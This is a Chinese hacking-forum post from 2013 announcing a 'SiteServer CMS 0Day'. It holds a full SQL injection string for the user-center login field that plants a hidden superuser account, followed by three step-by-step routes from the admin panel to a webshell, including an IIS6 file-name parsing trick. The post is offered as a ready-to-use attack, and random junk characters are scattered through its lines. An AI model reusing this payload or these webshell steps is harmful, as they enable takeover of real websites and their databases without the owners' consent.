找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 SiteServer CMS 0Day
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2627|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版! I# n9 u! b6 n7 U
& l: Z  a) }2 A
stieserver官网:www.siteserver.cn
0 r/ {  b* P7 k2 Y( ]* T
9 g3 v" O3 v+ _, G) ^8 R: W 8 {3 k  w9 C+ G4 I0 J: m& |

% |2 R  ^" m7 N* AEXP:' B! e5 l' Z, o
" c4 e, Z( B7 f4 F: _: G3 N3 O  j
直接访问UserCenter/login.aspx+ ]. n% d4 Z1 b1 G7 P" P
' z( u) V4 \' i+ S  g  C
7 h* k6 Z2 y5 z4 t; Z
0 N* J& q' P6 q' f5 ]2 A: C, G
用户名处输入:
  i. ^. q: X# Z1 p* {! _
9 c# r6 ^" X4 F, N% U8 P123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--; Q4 @) Y! u2 B# p5 J9 v

; P( R( U( j9 P 2 M) d2 u0 c2 I' E; H0 c
! _: Q; w# {8 R
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
* ^. N; D2 c% ]1 g# m4 h6 U
$ W2 Z1 N: `: K- V- [/ D: @3 Z
/ _2 ~3 I( |$ {; d* P" f
/ s" d8 S: U: M+ y2 K/ _" \, _之后再访问后台SiteServer/login.aspx用插入的用户登陆" m; K9 U+ a+ t. M- h4 ?0 n
: r' @  D0 n. R  A. B% l6 Z
# |0 P, e. p6 h* d: d3 ]" z

& m8 w6 J7 T! l2 H  d后台拿webshell的三种方法:
, O1 y- L0 ]' G5 B/ i; E
6 X0 A3 f2 v6 S$ h( F* ]- U9 z一、
+ F' F6 t' |7 o# E' t
$ w+ x( P' r" T, ^# v+ A站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx  R7 C5 _, N% g; W# Y3 [/ I  u$ ^

% G0 E; C' c/ d; `5 f+ l, R二、7 V' r* s( ~: X2 {+ c

( `2 E# r# @( s- G; o1 |4 h( R成员权限-》添加用户-》用户名为:1.asp
( H* j7 r9 {4 [- G' S  V7 A/ |# }9 \$ G* Y5 n; x- a
http://127.0.0.1/usercenter/7 U( j: i6 z, ]: k9 g3 o

. n8 Y) x& |5 K7 x( r; |! @用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
$ N1 y4 k" F9 K$ d, N/ j8 E2 f" S, j$ p  q" H! x( d) k, n+ g
(ps:后台添加用户时不会验证是否含有非法字符)
0 n0 ]9 ^% z$ P: u7 X! h# W4 O0 U8 a  [- r; a" D, e3 A
三、3 S/ k, x; c' J5 E( _* f

% V1 R5 f- }) n* Z系统工具-》实用工具-》机器参数查看4 |, k  y; X3 M- S3 F* _6 F
可以看到数据库类型、名称,WEB路径
+ P0 W' l/ ?; E/ W: ]2 X$ j4 W/ L' Y6 V2 i+ T
系统工具-》数据库工具-》SQL语句查询9 }! p# @7 u0 m
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。3 z# R$ c7 k( @
7 ~9 Z& x& w4 w
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表